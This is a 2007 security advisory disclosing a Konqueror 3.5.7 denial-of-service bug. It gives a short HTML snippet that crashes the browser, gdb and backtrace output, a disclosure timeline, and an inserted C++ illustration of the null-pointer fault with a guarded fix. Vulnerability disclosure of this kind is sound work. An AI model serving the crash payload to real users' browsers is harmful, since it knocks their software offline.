[BuHa-Security] DoS Vulnerability in Konqueror 3.5.7

Published 2007-08-03 on vulners.com


| BuHa Security-Advisory #16 | Aug 01st, 2007 |

| Vendor | KDE's Konqueror |
| URL | http://www.konqueror.org/ |
| Version | <= 3.5.7 |
| Risk | Low (Denial Of Service) |

o Description:

Konqueror is the file manager for the K Desktop Environment and an
Open Source web browser with HTML 4.01 compliance.

Visit http://www.konqueror.org/ for detailed information.

o Denial of Service:

The following HTML code forces Konqueror to crash:
> <textarea></button></textarea></br><bdo dir="">
> <pre><frameset>
> <a>

Online-demo:
http://morph3us.org/security/pen-testing/konqueror/1178292626-khtml.html

> (gdb) set args konqueror.html
> (gdb) r
> Starting program: /usr/bin/konqueror konqueror.html
> (no debugging symbols found)
> […]
> [Thread debugging using libthread_db enabled]
> [New Thread -1234381104 (LWP 5982)]
> (no debugging symbols found)
> […]
> Qt: gdb: -nograb added to command-line options.
> Use the -dograb option to enforce grabbing.
> X Error: BadDevice, invalid or uninitialized input device 169
> Major opcode: 145
> Minor opcode: 3
> Resource id: 0x0
> Failed to open device
> X Error: BadDevice, invalid or uninitialized input device 169
> Major opcode: 145
> Minor opcode: 3
> Resource id: 0x0
> Failed to open device
> (no debugging symbols found)
> […]
>
> Program received signal SIGSEGV, Segmentation fault.
> [Switching to Thread -1234381104 (LWP 5982)]
> 0xb5ef84e7 in ?? () from /usr/lib/libkhtml.so.

I sent a mail to KDE's security mailing list [1] and received an answer
from Dirk Mueller several days later. He wrote that the HTML code triggers
an assert and that, with the assert commented out, the backtrace ends in:

> #6 0xb7bb37a4 in khtml::RenderFlow::lastLineBox (this=0x0)
> at /home/dirk/src/kde/3.5/kdelibs/khtml/rendering/render_flow.h:65
> #7 0xb7c850df in khtml::RenderBlock::createLineBoxes (this=0x821ab08,
> obj=0x0)
> at /home/dirk/src/kde/3.5/kdelibs/khtml/rendering/bidi.cpp:624

This issue does not seem to be exploitable.
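As an added illustration (this is neither KDE's code nor part of the advisory), the following hypothetical C++ model shows the shape of the two frames above: a line-box walk that dereferences a null object, beside one that checks the parent link first. Only the names RenderFlow, lastLineBox and createLineBoxes come from the backtrace; every type layout, function body and sample tree is an assumption.

```cpp
// Constructed model of the backtrace frames above (createLineBoxes(obj=0x0) ->
// lastLineBox(this=0x0)); names mirror khtml, every body is hypothetical.
#include <cstdio>
#include <vector>
struct InlineFlowBox { int id; };

struct RenderFlow {
    RenderFlow* parent = nullptr;          // nullptr at the root, or in a malformed tree
    std::vector<InlineFlowBox> lineBoxes;  // stand-in for khtml's line-box list
    InlineFlowBox* lastLineBox() {         // reads this->lineBoxes: a null this faults here
        return lineBoxes.empty() ? nullptr : &lineBoxes.back();
    }
};

// Unguarded walk: assumes an unbroken parent chain from obj up to stop, so a
// missing ancestor calls lastLineBox() on a null object (the SIGSEGV above).
// An assert(obj) would only help in debug builds; release builds compile it out.
int createLineBoxesUnguarded(RenderFlow* obj, RenderFlow* stop) {
    int created = 0;
    for (; obj != stop; obj = obj->parent, ++created)
        if (!obj->lastLineBox()) obj->lineBoxes.push_back(InlineFlowBox{created});
    return created;
}

// Hardened walk: a null link ends the walk and reports -1 (malformed tree).
// This is a runtime check, not an assert, so it also protects release builds.
int createLineBoxesGuarded(RenderFlow* obj, RenderFlow* stop) {
    int created = 0;
    for (; obj != stop; obj = obj->parent, ++created) {
        if (obj == nullptr) return -1;
        if (!obj->lastLineBox()) obj->lineBoxes.push_back(InlineFlowBox{created});
    }
    return created;
}

// Two constructed trees: a well-formed three-level chain, and a node whose
// parent link is missing, standing in for the obj=0x0 seen in the backtrace.
int demoWellFormed() {
    RenderFlow block, mid, leaf;
    mid.parent = &block; leaf.parent = &mid;
    return createLineBoxesGuarded(&leaf, &block);      // 2
}
int demoMalformed() {
    RenderFlow block, detached;                        // detached.parent == nullptr
    return createLineBoxesGuarded(&detached, &block);  // -1 instead of a crash
}

int main() {
    std::printf("well-formed: %d, malformed: %d\n", demoWellFormed(), demoMalformed());
}
```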

o Disclosure Timeline:

03 May 07 - DoS vulnerability discovered.
07 May 07 - Vendor contacted.
10 May 07 - Vendor confirmed vulnerability.
01 Aug 07 - Public release.

o Solution:

There is no solution yet. I assume the KDE developers will address this
bug in an upcoming KDE release.

o Credits:

Thomas Waldegger <[email protected]>
BuHa-Security Community - http://buha.info/board/

If you have questions, suggestions or criticism about the advisory, feel
free to send me a mail. The address '[email protected]' is more a
spam address than a regular mail address, so it's possible that I
ignore some mails. Please use the contact details at http://morph3us.org/
to contact me.

Greets fly out to cyrus-tc, destructor, echox, Killsystem, nait, Neon,
Rodnox, trappy and all members of BuHa.

Advisory online:
http://morph3us.org/advisories/20070801-konqueror-3.57.txt

[1] http://www.kde.org/info/security/


Don't you feel the power of CSS Layouts?
BuHa-Security Community: https://buha.info/board/
